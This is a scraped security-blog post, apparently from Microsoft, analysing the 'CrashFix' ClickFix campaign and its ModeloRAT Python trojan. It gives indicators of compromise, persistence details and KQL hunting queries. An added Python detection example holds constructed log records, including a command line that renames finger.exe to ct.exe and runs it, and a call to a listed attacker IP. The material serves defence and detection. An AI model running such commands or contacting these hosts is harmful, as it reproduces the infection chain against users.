{"id":39281,"date":"2026-02-05T14:35:26","date_gmt":"2026-02-05T14:35:26","guid":{"rendered":"http:\/\/localhost\/?p=39281"},"modified":"2026-02-05T14:35:26","modified_gmt":"2026-02-05T14:35:26","slug":"new-clickfix-variant-crashfix-deploying-python-remote-access-trojan","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=39281","title":{"rendered":"New Clickfix variant \u2018CrashFix\u2019 deploying Python Remote Access Trojan_MSSECURE:A3DAD4B8A81AE9C9C31F7973ECA5B311"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-05T19:57:56&#8243;,&#8221;description&#8221;:&#8221;In January 2026, Microsoft Defender Experts identified a new evolution in the ongoing ClickFix campaign. This updated tactic deliberately crashes victims\u2019 browsers and then attempts to lure users into executing malicious commands under the pretext of restoring normal functionality.\\n\\nThis variant represents a notable escalation in ClickFix tradecraft, combining user disruption with social engineering to increase execution success while reducing reliance on traditional exploit techniques. The newly observed behavior has been designated _CrashFix_ , reflecting a broader rise in browser\u2011based social engineering combined with living\u2011off\u2011the\u2011land binaries and Python\u2011based payload delivery. Threat actors are increasingly abusing trusted user actions and native OS utilities to bypass traditional defences, making behaviour\u2011based detection and user awareness critical.\\n\\n# Technical Overview\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/02\/image-1.webp)_Crashfix Attack life cycle_.\\n\\nThis attack typically begins when a victim searches for an ad blocker and encounters a malicious advertisement. This ad redirects users to the official Chrome Web Store, creating a false sense of legitimacy around a harmful browser extension. 
The extension impersonates the legitimate uBlock Origin Lite ad blocker to deceive users into installing it.\\n\\n**Sample Data:**\\n    \\n    \\n    File Origin Referrer URL: https:\/\/chromewebstore.google[.]com\\n    FileOriginURL: https:\/\/clients2[.]googleusercontent[.]com\/crx\/blobs\/AdNiCiWgWaD8B4kV4BOi-xHAdl_xFwiwSmP8QmSc6A6E1zgoIEADAFK6BjirJRdrSZzhbF76CD2kGkCiVsyp7dbwdjMX-0r9Oa823TLI9zd6DKnBwQJ3J_98pRk8vPDsYoHiAMZSmuXxBj8-Ca_j38phC9wy0r6JCZeZXw\/CPCDKMJDDOCIKJDKBBEIAAFNPDBDAFMI_2025_1116_1842_0.crx?authuser=0 \\n    FileName: cpcdkmjddocikjdkbbeiaafnpdbdafmi_42974.crx\\n    Folderpath: C:\\\\Users\\\\PII\\\\AppData\\\\Local\\\\Temp\\\\scoped_dir20916_1128691746\\\\cpcdkmjddocikjdkbbeiaafnpdbdafmi_42974.crx\\n    SHA256: c46af9ae6ab0e7567573dbc950a8ffbe30ea848fac90cd15860045fe7640199c\\n    \\n\\nThe 32-letter prefix of the file name, cpcdkmjddocikjdkbbeiaafnpdbdafmi, is the Chrome extension ID; it also appears in the CRX download URL and in the Extensions folder of the user profile, which makes it the stable pivot for hunting. A per-installation UUID is transmitted to an attacker-controlled typosquatted domain, www[.]nexsnield[.]com, where it is used to correlate installation, update, and uninstall activities.\\n\\nTo evade detection and prevent users from immediately associating the malicious browser extension with subsequent harmful behavior, the payload employs a delayed execution technique. Once activated, the payload causes browser issues only after a period, making it difficult for victims to connect the disruptions to the previously installed malicious extension.\\n\\nThe core malicious functionality performs a denial-of-service attack against the victim\u2019s browser by creating an infinite loop. Eventually, it presents a fake _CrashFix_ security warning through a pop-up window to further mislead the user.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/02\/image-2.webp)_Fake CrashFix Popup window_.\\n\\nA notable new tactic in this ClickFix variant is the misuse of the legitimate native Windows utility finger.exe, which is originally intended to retrieve user information from remote systems. 
The threat actors are seen abusing this tool by executing the following malicious command through the Windows dialog box, in the usual ClickFix pattern: the page stages the command on the clipboard and the fake warning instructs the user to paste and run it.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/02\/image-3.webp)_Illustration of Malicious command copied to the clipboard_. ![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/02\/image-4.webp)_Malicious Clipboard copied Commands ran by users in the Windows dialog box_.\\n\\nThe native Windows utility finger.exe is copied into the temporary directory and subsequently renamed to ct.exe (**SHA\u2011256: beb0229043741a7c7bfbb4f39d00f583e37ea378d11ed3302d0a2bc30f267006**). This renaming is intended to obscure its identity and hinder detection during analysis. Note that the copy is byte-identical to the legitimate finger.exe, so this hash identifies the genuine Microsoft binary; detection has to key on the rename, the user-writable temp location and the outbound TCP/79 connection rather than on the hash.\\n\\nThe renamed ct.exe establishes a network connection to the attacker-controlled IP address 69[.]67[.]173[.]30, from which it retrieves a large char-code payload that decodes to obfuscated PowerShell. Upon execution, the obfuscated script downloads an additional PowerShell payload, script.ps1 (**SHA\u2011256: c76c0146407069fd4c271d6e1e03448c481f0970ddbe7042b31f552e37b55817**), from the attacker\u2019s server at 69[.]67[.]173[.]30\/b. The downloaded file is then saved to the victim\u2019s AppData\\\\Roaming directory, enabling further execution.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/02\/image-6-1024&#215;102.webp)Obfuscated PowerShell commands downloading additional payload script.ps1.\\n\\nThe downloaded PowerShell payload, script.ps1, contains several layers of obfuscation. 
Upon de-obfuscation, the following behaviors were identified:\\n\\n  * The script enumerates running processes and checks for the presence of multiple analysis or debugging tools such as Wireshark, Process Hacker, WinDbg, and others.\\n  * It determines whether the machine is domain-joined, as part of an environment or privilege assessment.\\n  * It sends a POST request to the attacker-controlled endpoint 69[.]67[.]173[.]30, presumably to exfiltrate system information or retrieve further instructions.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/02\/image-7.webp)Illustration of Script-Based Anti-Analysis Behavior.\\n\\nBecause the affected host was domain-joined, the script proceeded to download a backdoor onto the device. This behavior suggests that the threat actor selectively deploys additional payloads when higher-value targets, such as domain-joined enterprise systems, are identified. It also means that a detonation in a standalone, non-domain-joined sandbox may never reach this stage, so analysts should expect the chain to look shorter there than it does on a real workstation.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/02\/image-8.webp)Script.ps1 downloading a WinPython package and a python-based payload for domain-joined devices.\\n\\nThe component WPy64\u201131401 is a WinPython package, a portable Python distribution that requires no installation. In this campaign, the attacker bundles a complete Python environment with the payload so that it runs whether or not Python is present on the victim\u2019s system.\\n\\nThe core malicious logic resides in the modes.py file, which functions as a Remote Access Trojan (RAT). 
Script.ps1 launches the payload with pythonw.exe rather than python.exe so that it runs without a visible console window, reducing the chance that the user notices it.\\n\\nThe RAT, identified as ModeloRAT here, communicates with the attacker\u2019s command-and-control (C2) servers by sending periodic beacon requests using the following format:\\n\\nhttp:\/\/{C2_IPAddress}:80\/beacon\/{client_id}\\n\\n* * *\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/02\/image-9.webp)_Illustration of ModeloRAT C2 communication via HTTP beaconing_.\\n\\nThe RAT then establishes persistence by creating a Run registry entry: it rewrites the Python script\u2019s launch command to use pythonw.exe and writes the value under:\\n\\nHKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run  \\nThis ensures that the malicious Python payload is executed automatically each time the user logs in, allowing the attacker to maintain ongoing access to the compromised system. A Run value whose data invokes pythonw.exe with a script path is an easy pivot for hunting.\\n\\nModeloRAT subsequently downloaded an additional payload from a Dropbox URL, which delivered a Python script named extentions.py. This script was executed using python.exe.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/02\/image-10.webp)Python payload extension.py dropped via Dropbox URL.\\n\\nModeloRAT initiated extensive reconnaissance activity upon execution. It leveraged a series of native Windows commands, such as nltest, whoami, and net use, to enumerate detailed domain, user, and network information.\\n\\nAdditionally, in post-compromise infection chains, Microsoft identified an encoded PowerShell command that downloads a ZIP archive from the IP address 144.31.221[.]197. 
The archive contains a Python-based payload (udp.pyw) and a renamed Python interpreter (run.exe); the PowerShell command then establishes persistence by creating a scheduled task named \u201cSoftwareProtection\u201d, chosen to blend in as a legitimate software-protection service, which re-runs the Python payload every 5 minutes. Because the interpreter is renamed, the task action (run.exe invoked with a .pyw argument) is the durable signal, not the task name, which the actor can change at will.\\n\\n![](https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/02\/image-11.webp)`PowerShell Script downloading and executing Python-based Payload and creating a scheduled task persistence`.\\n\\n## Mitigation and protection guidance\\n\\n  * Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. \\n  * Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to help remediate malicious artifacts that are detected post-breach. \\n  * As a best practice, organizations may apply network egress filtering and restrict outbound access to protocols, ports, and services that are not operationally required. Disabling or limiting network activity initiated by legacy or rarely used utilities, such as the finger utility (TCP port 79), can help reduce the attack surface and limit opportunities for adversaries to misuse built-in system tools. Because the binary in this campaign is copied and renamed before use, filter on the destination port and on outbound connections from user-writable directories rather than on the file name finger.exe alone.\\n  * Enable network protection in Microsoft Defender for Endpoint. \\n  * Turn on web protection in Microsoft Defender for Endpoint. 
\\n  * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. \\n  * Enforce MFA on all accounts, remove users excluded from MFA, and strictly require MFA from all devices, in all locations, at all times. \\n  * Remind employees that enterprise or workplace credentials should not be stored in browsers or password vaults secured with personal credentials. Organizations can turn off password syncing in the browser on managed devices using Group Policy. \\n  * Turn on the following attack surface reduction rule to block or audit activity associated with this threat: \\n    * Block executable files from running unless they meet a prevalence, age, or trusted list criterion\\n\\nYou can assess how an attack surface reduction rule might impact your network by opening the security recommendation for that rule in Vulnerability management. In the Recommendation details pane, check the user impact to determine what percentage of your devices can accept a new policy enabling the rule in blocking mode without adverse impact to user productivity. Note that the renamed ct.exe is a byte-for-byte copy of the signed finger.exe, so a prevalence or trusted-list check is unlikely to treat it as unknown; the egress-filtering guidance above is the control that addresses that stage.\\n\\n## Microsoft Defender XDR detections \\n\\nMicrosoft Defender XDR customers can refer to the list of applicable detections below. 
Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.\\n\\nCustomers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.\\n\\n**Tactic**| **Observed activity**| **Microsoft Defender coverage**  \\n---|---|---  \\nExecution| Execution of malicious Python payloads using the Python interpreter; scheduled task process launched| **Microsoft Defender for Endpoint**: Suspicious Python binary execution; Suspicious scheduled Task Process launched  \\nPersistence| Registry Run key created| **Microsoft Defender for Endpoint**: Anomaly detected in ASEP registry  \\nDefense Evasion| Scheduled task created to mimic and blend in as a legitimate software protection service| **Microsoft Defender for Endpoint**: Masqueraded task or service  \\nDiscovery| Queried for installed security products; enumerated users, domain, and network information| **Microsoft Defender for Endpoint**: Suspicious security software Discovery; Suspicious Process Discovery; Suspicious LDAP query  \\nExfiltration| Finger utility used to retrieve malicious commands from attacker-controlled servers| **Microsoft Defender for Endpoint**: Suspicious use of finger.exe  \\nMalware| Malicious Python payload observed| **Microsoft Defender for Endpoint**: Suspicious file observed  \\n\\n## Threat intelligence reports\\n\\nMicrosoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. 
These reports provide intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.\\n\\n## Microsoft Defender XDR\\n\\n### Hunting queries \\n\\nMicrosoft Defender XDR customers can run the following queries to find related activity in their environment:\\n\\n**Use the below query to identify the presence of the malicious Chrome extension**\\n    \\n    \\n    DeviceFileEvents\\n    | where FileName has \\&#8221;cpcdkmjddocikjdkbbeiaafnpdbdafmi\\&#8221;\\n    \\n\\n**Use the below query to identify network connections related to the malicious Chrome extension**\\n    \\n    \\n    DeviceNetworkEvents\\n    | where RemoteUrl has_all (\\&#8221;nexsnield.com\\&#8221;)\\n    \\n\\n**Use the below query to identify the abuse of the LOLBIN finger.exe**\\n    \\n    \\n    DeviceProcessEvents\\n    | where InitiatingProcessCommandLine has_all (\\&#8221;cmd.exe\\&#8221;,\\&#8221;start\\&#8221;,\\&#8221;finger.exe\\&#8221;,\\&#8221;ct.exe\\&#8221;) or ProcessCommandLine has_all (\\&#8221;cmd.exe\\&#8221;,\\&#8221;start\\&#8221;,\\&#8221;finger.exe\\&#8221;,\\&#8221;ct.exe\\&#8221;)\\n    | project-reorder Timestamp,DeviceId,InitiatingProcessCommandLine,ProcessCommandLine,InitiatingProcessParentFileName\\n    \\n\\n**Use the below query to identify network connections to the malicious IP address** (the first stage collects the remote IPs contacted by the renamed finger.exe; the join then returns every connection to those IPs from any process)\\n    \\n    \\n    DeviceNetworkEvents\\n    | where InitiatingProcessCommandLine has_all (\\&#8221;ct.exe\\&#8221;,\\&#8221;confirm\\&#8221;)\\n    | distinct RemoteIP\\n    | join kind=inner (DeviceNetworkEvents) on RemoteIP\\n    | project Timestamp, DeviceId, DeviceName, RemoteIP, RemoteUrl, InitiatingProcessCommandLine, InitiatingProcessParentFileName\\n    \\n\\n**Use the below query to identify network connections to the beacon IP address**\\n    \\n    \\n    DeviceNetworkEvents\\n    | where InitiatingProcessCommandLine has_all (\\&#8221;pythonw.exe\\&#8221;,\\&#8221;modes.py\\&#8221;)\\n    | where 
RemoteIP !in (\\&#8221;\\&#8221;, \\&#8221;127.0.0.1\\&#8221;)\\n    | project-reorder Timestamp, DeviceName,DeviceId,TenantId,OrgId,RemoteUrl,InitiatingProcessCommandLine,InitiatingProcessParentFileName\\n    \\n\\n**Use the below query to identify the registry Run key persistence** (it keys on the writing process; to catch the same value written by another process, also filter on RegistryKey containing CurrentVersion\\\\Run and RegistryValueData containing pythonw.exe)\\n    \\n    \\n    DeviceRegistryEvents\\n    | where InitiatingProcessCommandLine has_all (\\&#8221;pythonw.exe\\&#8221;,\\&#8221;modes.py\\&#8221;)\\n    \\n\\n**Use the below query to identify the scheduled task persistence**\\n    \\n    \\n    DeviceEvents\\n    | where ActionType == \\&#8221;ScheduledTaskCreated\\&#8221;\\n    | where InitiatingProcessCommandLine has_all (\\&#8221;run.exe\\&#8221;, \\&#8221;udp.pyw\\&#8221;)\\n    \\n\\n## Indicators of compromise\\n\\n**Indicator**| **Type**| **Description**  \\n---|---|---  \\nnexsnield[.]com| Domain| Attacker-controlled domain contacted by the malicious browser extension  \\n69[.]67[.]173[.]30| IP Address| Attacker-controlled infrastructure serving malicious commands and additional payloads  \\n144[.]31[.]221[.]197| IP Address| Attacker-controlled infrastructure serving malicious commands and additional payloads  \\n199[.]217[.]98[.]108| IP Address| Attacker-controlled infrastructure serving malicious commands and additional payloads  \\n144[.]31[.]221[.]179| IP Address| Attacker-controlled infrastructure serving malicious commands and additional payloads  \\nhxxps[:]\/\/www[.]dropbox[.]com\/scl\/fi\/znygol7goezlkhnwazci1\/a1.zip| URL| Adversary-hosted Python payload  \\n158[.]247[.]252[.]178| IP Address| ModeloRAT C2 server  \\n170[.]168[.]103[.]208| IP Address| ModeloRAT C2 server  \\nc76c0146407069fd4c271d6e1e03448c481f0970ddbe7042b31f552e37b55817| SHA-256| Second-stage PowerShell payload (script.ps1)  \\nc46af9ae6ab0e7567573dbc950a8ffbe30ea848fac90cd15860045fe7640199c| SHA-256| Malicious Chrome extension (.crx)  \\n01eba1d7222c6d298d81c15df1e71a492b6a3992705883c527720e5b0bab701a| SHA-256| Malicious Chrome extension  \\n6f7c558ab1fad134cbc0508048305553a0da98a5f2f5ca2543bc3e958b79a6a3| SHA-256| Malicious Chrome extension  \\n3a5a31328d0729ea350e1eb5564ec9691492407f9213f00c1dd53062e1de3959| SHA-256| Malicious Chrome extension  \\n6461d8f680b84ff68634e993ed3c2c7f2c0cdc9cebb07ea8458c20462f8495aa| SHA-256| Malicious Chrome extension  \\n37b547406735d94103906a7ade6e45a45b2f5755b9bff303ff29b9c2629aa3c5| SHA-256| Malicious Chrome extension  \\n\\n## Microsoft Sentinel\\n\\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.\\n\\n## References\\n\\n  * https:\/\/www.huntress.com\/blog\/malicious-browser-extention-crashfix-kongtuke\\n\\n_This research is provided by Microsoft Defender Security Research with contributions from Sai Chakri Kandalai and Kaustubh Mangalwedhekar_.\\n\\n## Learn more\\n\\nReview our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.  
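
The hunting queries above are KQL. As an added example that is not part of Microsoft's post, the same matching logic is expressed in Python and run over constructed telemetry records, so the rules (including the loopback exclusion in the beacon query and the two persistence checks) can be exercised offline. Column names follow the Defender advanced hunting schema; the sample command lines, file paths and the `confirm@` argument are constructed stand-ins for this example, not values taken from the blog's screenshots, and `has_all` is approximated with case-insensitive substring matching.

```python
"""Hunting logic for the CrashFix chain over constructed telemetry.

Each rule mirrors one of the advanced hunting queries above (record keys
follow the Defender table/column names). The sample records are constructed
for this example; paths and command-line arguments are plausible stand-ins,
not values taken from the blog's screenshots.
"""
from dataclasses import dataclass

EXTENSION_ID = "cpcdkmjddocikjdkbbeiaafnpdbdafmi"   # Chrome extension ID from the CRX file name
RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
LOCAL_IPS = {"", "127.0.0.1", "::1"}                # mirrors the RemoteIP !in (...) clause


def has_all(text, terms):
    """Approximation of KQL has_all(): every term occurs, case-insensitively.
    KQL 'has' matches whole terms; plain substring search is used here, which
    is slightly looser (an assumption of this example, not KQL's tokenizer)."""
    haystack = (text or "").lower()
    return all(term.lower() in haystack for term in terms)


FINGER_TOKENS = ["cmd.exe", "start", "finger.exe", "ct.exe"]

# (rule name, Defender table, predicate over one record)
RULES = [
    ("extension_file_observed", "DeviceFileEvents",
     lambda e: EXTENSION_ID in (e.get("FileName") or "").lower()),
    ("extension_domain_contact", "DeviceNetworkEvents",
     lambda e: has_all(e.get("RemoteUrl"), ["nexsnield.com"])),
    ("finger_lolbin_renamed", "DeviceProcessEvents",
     lambda e: has_all(e.get("ProcessCommandLine"), FINGER_TOKENS)
     or has_all(e.get("InitiatingProcessCommandLine"), FINGER_TOKENS)),
    ("ct_exe_outbound", "DeviceNetworkEvents",
     lambda e: has_all(e.get("InitiatingProcessCommandLine"), ["ct.exe", "confirm"])),
    ("modelorat_beacon", "DeviceNetworkEvents",
     lambda e: has_all(e.get("InitiatingProcessCommandLine"), ["pythonw.exe", "modes.py"])
     and e.get("RemoteIP") not in LOCAL_IPS),
    # Keys on the writing process as the blog's query does, and additionally on the
    # Run key + value data so the same persistence written by another process is caught.
    ("run_key_persistence", "DeviceRegistryEvents",
     lambda e: has_all(e.get("InitiatingProcessCommandLine"), ["pythonw.exe", "modes.py"])
     or (RUN_KEY.lower() in (e.get("RegistryKey") or "").lower()
         and has_all(e.get("RegistryValueData"), ["pythonw.exe", "modes.py"]))),
    ("scheduled_task_persistence", "DeviceEvents",
     lambda e: e.get("ActionType") == "ScheduledTaskCreated"
     and has_all(e.get("InitiatingProcessCommandLine"), ["run.exe", "udp.pyw"])),
]


@dataclass
class Finding:
    rule: str
    device: str
    evidence: str


def hunt(events):
    """Apply every rule to every record; one Finding per (record, rule) hit."""
    findings = []
    for e in events:
        for rule, table, matches in RULES:
            if e.get("Table") == table and matches(e):
                evidence = (e.get("ProcessCommandLine") or e.get("InitiatingProcessCommandLine")
                            or e.get("RemoteUrl") or e.get("FileName") or "")
                findings.append(Finding(rule, e.get("DeviceName", "?"), evidence))
    return findings


# Constructed telemetry: seven records that should fire and two that should not.
SAMPLE_EVENTS = [
    {"Table": "DeviceFileEvents", "DeviceName": "ws01",
     "FileName": "cpcdkmjddocikjdkbbeiaafnpdbdafmi_42974.crx"},
    {"Table": "DeviceNetworkEvents", "DeviceName": "ws01", "RemoteIP": "203.0.113.10",
     "InitiatingProcessCommandLine": "chrome.exe", "RemoteUrl": "https://www.nexsnield.com/"},
    {"Table": "DeviceProcessEvents", "DeviceName": "ws01",
     "InitiatingProcessCommandLine": "explorer.exe",   # constructed stand-in for the pasted command
     "ProcessCommandLine": r"cmd.exe /c copy C:\Windows\System32\finger.exe %TEMP%\ct.exe & start %TEMP%\ct.exe"},
    {"Table": "DeviceNetworkEvents", "DeviceName": "ws01", "RemoteIP": "69.67.173.30", "RemotePort": 79,
     "InitiatingProcessCommandLine": "ct.exe confirm@69.67.173.30"},   # argument is an assumption
    {"Table": "DeviceNetworkEvents", "DeviceName": "ws01", "RemoteIP": "158.247.252.178",
     "InitiatingProcessCommandLine": r"C:\Users\pii\AppData\Roaming\WPy64-31401\pythonw.exe modes.py",
     "RemoteUrl": "http://158.247.252.178/beacon/ab12"},
    {"Table": "DeviceRegistryEvents", "DeviceName": "ws01", "RegistryKey": RUN_KEY,
     "RegistryValueName": "modes",
     "RegistryValueData": r"C:\Users\pii\AppData\Roaming\WPy64-31401\pythonw.exe modes.py",
     "InitiatingProcessCommandLine": r"C:\Users\pii\AppData\Roaming\WPy64-31401\pythonw.exe modes.py"},
    {"Table": "DeviceEvents", "DeviceName": "ws02", "ActionType": "ScheduledTaskCreated",
     "InitiatingProcessCommandLine": "powershell.exe -enc <base64> run.exe udp.pyw"},
    # Negatives: loopback traffic from the same interpreter, and a legitimate task creation.
    {"Table": "DeviceNetworkEvents", "DeviceName": "ws01", "RemoteIP": "127.0.0.1",
     "InitiatingProcessCommandLine": r"C:\Users\pii\AppData\Roaming\WPy64-31401\pythonw.exe modes.py"},
    {"Table": "DeviceEvents", "DeviceName": "ws02", "ActionType": "ScheduledTaskCreated",
     "InitiatingProcessCommandLine": "svchost.exe -k netsvcs -p -s Schedule"},
]


def rules_fired(events=SAMPLE_EVENTS):
    """Set of rule names that matched at least one record."""
    return {f.rule for f in hunt(events)}


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.rule:28s} {f.device:6s} {f.evidence}")
```

The loopback record is deliberately included: the blog's beacon query excludes empty and 127.0.0.1 remote addresses, and a port of this logic that drops that clause will page on the interpreter talking to itself. To run it against real exports, feed `hunt()` the rows of an advanced hunting CSV with a `Table` column added per source table.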
\\n\\nLearn more about securing Copilot Studio agents with Microsoft Defender \\n\\nLearn more about Protect your agents in real-time during runtime (Preview) \u2013 Microsoft Defender for Cloud Apps | Microsoft Learn  \\n\\nExplore how to build and customize agents with Copilot Studio Agent Builder  \\n\\nThe post New Clickfix variant \u2018CrashFix\u2019 deploying Python Remote Access Trojan appeared first on Microsoft Security Blog.&#8221;,&#8221;published&#8221;:&#8221;2026-02-05T18:51:39&#8243;,&#8221;modified&#8221;:&#8221;2026-02-05T18:51:39&#8243;,&#8221;type&#8221;:&#8221;mssecure&#8221;,&#8221;title&#8221;:&#8221;New Clickfix variant \u2018CrashFix\u2019 deploying Python Remote Access Trojan&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSSECURE:A3DAD4B8A81AE9C9C31F7973ECA5B311&#8243;,&#8221;bulletinFamily&#8221;:&#8221;blog&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;&#8221;,&#8221;sourceHref&#8221;:&#8221;&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221
;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/02\/05\/clickfix-variant-crashfix-deploying-python-rat-trojan\/&#8221;,&#8221;category_name&#8221;:&#8221;News&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-05T19:57:56&#8243;,&#8221;description&#8221;:&#8221;In January 2026, Microsoft Defender Experts identified a new evolution in the ongoing ClickFix campaign. 
This updated tactic deliberately crashes victims\u2019 browsers and then attempts&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,110,13,33,7,11,5],"class_list":["post-39281","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-mssecure","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>New Clickfix variant \u2018CrashFix\u2019 deploying Python Remote Access Trojan_MSSECURE:A3DAD4B8A81AE9C9C31F7973ECA5B311 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=39281\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"New Clickfix variant \u2018CrashFix\u2019 deploying Python Remote Access Trojan_MSSECURE:A3DAD4B8A81AE9C9C31F7973ECA5B311 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-05T19:57:56&#8243;,&#8221;description&#8221;:&#8221;In January 2026, Microsoft Defender Experts identified a new evolution in the ongoing ClickFix campaign. 
This updated tactic deliberately crashes victims\u2019 browsers and then attempts...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=39281\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-05T14:35:26+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"13 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39281#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39281\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"New Clickfix variant \u2018CrashFix\u2019 deploying Python Remote Access 